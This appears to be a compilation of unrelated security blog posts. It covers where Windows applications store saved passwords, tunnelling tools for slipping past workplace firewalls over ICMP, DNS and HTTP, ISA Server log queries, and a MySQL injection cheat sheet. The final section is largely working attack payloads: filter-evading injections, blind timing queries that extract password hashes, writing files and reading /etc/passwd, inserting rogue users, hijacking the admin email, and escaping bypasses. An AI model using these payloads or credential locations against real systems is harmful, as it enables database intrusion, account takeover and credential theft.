Many people ask me about the location in the Registry or file system that Windows applications store the passwords. So I prepared a list of password storage locations for more than 20 popular applications and Windows components.
Be aware that even if you know the location of the saved password, it doesn’t mean that you can move it from one computer to another. many applications store the passwords in a way that prevent you from moving them to another computer or user profile.
However, you can use this information to remove unwanted saved passwords from your system.

• Windows Network Passwords (XP/Vista/2003): When you connect to the file system of another computer on your network (something like \\MyComp\MyFolder), Windows allows you to save the password. If you choose to save the password, the encrypted password is stored in a credential file.
  The credential file is stored in the following locations:
  • Windows XP/2003: [Windows Profile]\Application Data\Microsoft\Credentials\[User SID]\Credentials and [Windows Profile]\Local Settings\Application Data\Microsoft\Credentials\[User SID]\Credentials
  • Windows Vista: [Windows Profile]\AppData\Roaming\Microsoft\Credentials\[Random ID] and [Windows Profile]\AppData\Local\Microsoft\Credentials\[Random ID]

  You can use my Network Password Recovery utility to view all passwords stored in these Credentials files.

• Dialup/VPN Passwords (2000/XP/Vista/2003): Dialup/VPN passwords are stored as LSA secrets under HKEY_LOCAL_MACHINE\Security\Policy\Secrets. This key contains multiple sub-keys, and the sub-keys which store the dialup passwords contains one of the following strings: RasDefaultCredentials and RasDialParams.This key is not accessible from RegEdit and other tools by default, but you can use one of the following methods to access this key:
  1. Use at command to run RegEdit.exe as SYSTEM user: (doesn’t work under Vista)
     For Example:
     at 16:14 /interactive regedit.exe
  2. Change the permission of entire Security key. If you do that, it’s recommeneded to return the permissions back to the original after you finish.
• Internet Explorer 4.00 – 6.00: The passwords are stored in a secret location in the Registry known as the “Protected Storage”. The base key of the Protected Storage is located under the following key: “HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”. In order to view the subkeys of this key in RegEdit, you must do the same process as explained for the LSA secrets.
  Even when you browse the above key in the Registry Editor (RegEdit), you won’t be able to watch the passwords, because they are encrypted. Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.IE PassView and Protected Storage PassView utilities allow you to recover these passwords.
• Internet Explorer 7.00 – 8.00:The new versions of Internet Explorer stores the passwords in 2 different locations. AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2. HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords.IE PassView can be used to recover these passwords.
• Firefox: The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version) These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name] Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.
• Google Chrome Web browser: The passwords are stored in [Windows Profile]\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data (This filename is SQLite database which contains encrypted passwords and other stuff)
• Opera: The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile
• Outlook Express (All Versions): The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.
• Outlook 98/2000: Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.
• Outlook 2002-2008: All new versions of Outlook store the passwords in the same Registry key of the account settings. The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index] If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.Mail PassView can be used to recover lost passwords of Outlook 2002-2008.
• Windows Live Mail: All account settings, including the encrypted passwords, are stored in [Windows Profile]\Local Settings\Application Data\Microsoft\Windows Live Mail\[Account Name] The account filename is an xml file with .oeaccount extension.Mail PassView can be used to recover lost passwords of Windows Live Mail.
• ThunderBird: The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name] You should search a filename with .s extension.
• Google Talk: All account settings, including the encrypted passwords, are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[Account Name]
• Google Desktop: Email passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes\[Account Name]
• MSN/Windows Messenger version 6.x and below: The passwords are stored in one of the following locations:
  1. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger
  2. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MessengerService
  3. In the Credentials file, with entry named as “Passport.Net\\*”. (Only when the OS is XP or more)
• MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds\[Account Name]
• Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with entry name begins with “WindowsLive:name=”. These passwords can be recovered by both Network Password Recovery and MessenPass utilities.
• Yahoo Messenger 6.x: The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager (“EOptions string” value)
• Yahoo Messenger 7.5 or later: The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager – “ETS” value. The value stored in “ETS” value cannot be recovered back to the original password.
• AIM Pro: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\AIM\AIMPRO\[Account Name]
• AIM 6.x: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords
• ICQ Lite 4.x/5.x/2003: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Mirabilis\ICQ\NewOwners\[ICQ Number] (MainLocation value)
• ICQ 6.x: The password hash is stored in [Windows Profile]\Application Data\ICQ\[User Name]\Owner.mdb (Access Database) (The password hash cannot be recovered back to the original password)
• Digsby: The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat All other passwords are stored in Digsby servers.
• PaltalkScene: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name].

There are times when you have only ICMP enabled for the outside world. Nothing else works and you want to get your stuff to work. So what do you do? Simple! Use PTunnel!

Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies. It does so by tunneling TCP connections over ICMP packets.

It’s features are:

• Tunnel TCP using ICMP echo request and reply packets
• Connections are reliable (lost packets are resent as necessary)
• Handles multiple connections
• Acceptable bandwidth (150 kb/s downstream and about 50 kb/s upstream are the currently measured maximas for one tunnel, but with tweaking this can be improved further)
• Authentication, to prevent just anyone from using your proxy

PTunnel will not work in the condition that when an outgoing/incoming ping not allowed, or filtered by a gateway somewhere along the way. Also, it does not involve any congestion control. But a good thing is that it is open source and supports both Linux, Windows & Mac. For Windows, you will also need WinPcap.

Download the latest version 0.70 here.

Source.

Okay, so iodine slipped off my mind yesterday while I was writing about DNS2TCP. I also forgot that iodine IS included in BackTrack! My bad.

So, getting back to the point, iodine lets  you tunnel IPv4 data through a DNS server. This can be usable in different situations where internet access is firewalled, but DNS queries are allowed (mostly in your offices!). Okay! I heard you alright. You might ask me, what if the DNS port is blocked and you have some weird port open? Worry not! You can set up iodine to use that weird port! You can use -p on iodine to specify an alternate port (like -p 5353) and use for instance iptables (on Linux) to forward the traffic:

iptables -t nat -A PREROUTING -i eth0 -p udp --dport 53 -j DNAT --to :5353

Cool eh? Wait till you hear this: The name iodine was chosen since it starts with IOD (IP Over DNS) and since iodine has atomic number 53, which happens to be the DNS port number!

Compared to other DNS tunnel implementations, iodine offers:

Higher performance

iodine uses the NULL type that allows the downstream data to be sent without encoding. Each DNS reply can contain nearly a kilobyte of payload data.

Portability

iodine runs on many different UNIX-like systems. Tunnels can be set up between two hosts no matter their endianness or operating system.

Security

iodine uses challenge-response login secured by MD5 hash. It also filters out any packets not coming from the IP used when logging in. DNS2TCP atleast does not support the security feature.

Less setup

iodine handles setting IP number on interfaces automatically, and up to 16 users can share one server at the same time. Packet size is automatically probed for maximum downstream throughput.

Also, what I have observed that DNS2TCP does not work most of the times as it’s MTU is greater than 512. 512 bytes is the limit for some DNS servers. You can use -m to modify this option too!

Windows users, make merry as this tool also has a working Windows port! Read more about this tool here.

Version 0.5.2  Released on 2009-06-01

You can download the Win32 version here and a tar.gz version here.

So, you are at work and all you have are the default HTTP ports open. You still want to use other ports and do things other normal users would do. What do you do in such a case? Simple! Use Webtunnel!

Webtunnel is a network utility that encapsulates arbitrary data in HTTP and transmits it through a web server.

This rings a bell alright! HTTPTunnel! Well, not exactly. It is similar to httptunnel, however, it has several key important differences: its server component runs in the context of a web server as a CGI application (with optional FastCGI support) so it does not need its own port, and supports most things that the web server supports, such as authentication, HTTP 1.1, HTTPS, and client certificates; it uses simple requests and responses so it works seamlessly through forward and reverse proxies; it is multi-threaded (actually multi-process using sockets for inter-process communication) to allow multiple parallel connections to multiple destinations simultaneously. Also, HTTPTunnel refuses to work through a reverse proxy. To top it, it allowed only one connection at a time and required multiple instances to tunnel to different ports!

A good news is that a new version was released yesterday! So, in Webtunnel 0.0.3 you have,
Added child wait in server to fix zombies under FastCGI
Added user authentication based on HTTP user
Added access control lists based on user
Changed the default debug level to 1
Changed some command line behavior

Download and related information is available here:
Download: Get the latest version of the software.
Documentation: Browse the user documentation.
Forums: Disucss with other webtunnel users.
Bugs: Review and submit bug repots.

—————————–

WebTunnel 0.0.6 released!

WHAT’S NEW

2009/05/13

Added an option to be able to include HTTP headers in requests<br>

Download it here.

Source.

In order to query the log, in addtion to the builtin query viewer of ISA, you can install SQL client tools, then use SQL Analyzer to connect to ISA-SERVER\MSFW (replace ISA-SERVER with your actual server name) and query the log. See the example here.

The builtin query viewer of ISA can show only the first 10,000 log records.

In addition, you can use the script to show the log entries. A sample script can be downloaded here. It can query the last 30 days of log. Just download it, rename it to a *.vbs file, and run it on your ISA Server. Make sure to change the first 2 input data (LogDate and ClientUserName) in the script file to match your actual data before runing. And, don’t forget that the script syntax is cscript LogQuery.vbs [LogData.txt]

Below is a sample result of a script query.

To further customize the script, you can study the ISA constants in an SDK include file named comenum.h. Other ISA development topics can be found here.

Cái này là phương thức chống lại các biện pháp bảo mật của admin nhằm chống lại SQL injection !.

Basics.

SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Variations.

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"

SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT VERSION
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT host,user,db from mysql.db
SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;

Blind injection vectors.

Operators

SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;

Evaluate

all render TRUE or 1.
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);

Math

SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);

Misc

SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');

Benchmark

SELECT BENCHMARK(10000000,ENCODE('abc','123'));
this takes around 5 sec on a localhost

SELECT BENCHMARK(1000000,MD5(CHAR(116)))
this takes around 7 sec on a localhost

SELECT BENCHMARK(10000000,MD5(CHAR(116)))
this takes around 70 sec on a localhost

Using the timeout to check if user exists

SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

Beware of of the N rounds, add an extra zero and it could stall or crash your
browser!

Gathering info

Table mapping

SELECT COUNT(*) FROM tablename

Field mapping

SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;

User mapping

SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'

Advanced SQL vectors

Writing info into files

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'

Writing info into files without single quotes: (example)

SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) INTO
OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(
39))

Note: You must specify a new file, it may not exist! and give the correct
pathname!

The CHAR() quoteless function

SELECT * FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))

SELECT * FROM login WHERE user = CHAR(39,97,39)

Extracting hashes

SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

example:

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

SELECT user FROM login WHERE user = ‘admin’
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(‘x’)),null) FROM login

explaining: (passwordfield,startcharacter,selectlength)

is like: (password,1,2) this selects: ‘ab’
is like: (password,1,3) this selects: ‘abc’
is like: (password,1,4) this selects: ‘abcd’

A quoteless example:

SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

Possible chars: 0 to 9 – ASCII 48 to 57 ~ a to z – ASCII 97 to 122

Misc

Insert a new user into DB

INSERT INTO login SET user = 'r00t', pass = 'abc'

Retrieve /etc/passwd file, put it into a field and insert a new user

load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user =
'r00t', pass = 'abc'

Then login!

Write the DB user away into tmp

SELECT host,user,password FROM user into outfile '/tmp/passwd';

Change admin e-mail, for “forgot login retrieval.”

UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';

Bypassing PHP functions

(MySQL 4.1.x before 4.1.20 and 5.0.x)

Bypassing addslashes() with GBK encoding

WHERE x = 0xbf27admin 0xbf27

Bypassing mysql_real_escape_string() with BIG5 or GBK

"injection string"
に関する追加情報：

the above chars are Chinese Big5

Advanced Vectors

Using an HEX encoded query to bypass escaping.

Normal:

SELECT * FROM login WHERE user = 'root'

Bypass:

SELECT * FROM login WHERE user = 0x726F6F74

Inserting a new user in SQL.

Normal:

insert into login set user = ‘root’, pass = ‘root’

Bypass:

insert into login set user = 0×726F6F74, pass = 0×726F6F74

How to determin the HEX value for injection.

SELECT HEX('root');

gives you:

726F6F74

then add:

0x

before it.

Source.